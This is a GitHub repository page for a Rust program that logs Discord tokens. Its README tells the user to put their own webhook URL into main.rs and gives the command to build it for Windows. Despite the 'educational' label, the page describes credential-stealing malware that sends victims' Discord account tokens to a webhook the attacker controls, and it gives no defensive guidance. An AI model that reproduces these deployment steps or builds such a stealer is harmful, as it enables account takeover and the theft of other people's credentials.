Skip to content

This project is a Discord token logger written in Rust, designed for educational purposes to demonstrate how Discord tokens can be captured and managed securely. It aims to educate users about potential security vulnerabilities and how to protect against them.

License

Notifications You must be signed in to change notification settings

MasterOfBrokenLogic/DiscordTokenLogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

TokenLogger-rs

A Discord Token Logger Written in Rust

On line 12 in main.rs (shown below) you must replace the variable with your webhook url

let url = "Discord Webhook URL";

To build just do

$ cargo build --target x86_64-pc-windows-gnu

Sidenote, I hate strings :3

About

This project is a Discord token logger written in Rust, designed for educational purposes to demonstrate how Discord tokens can be captured and managed securely. It aims to educate users about potential security vulnerabilities and how to protect against them.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages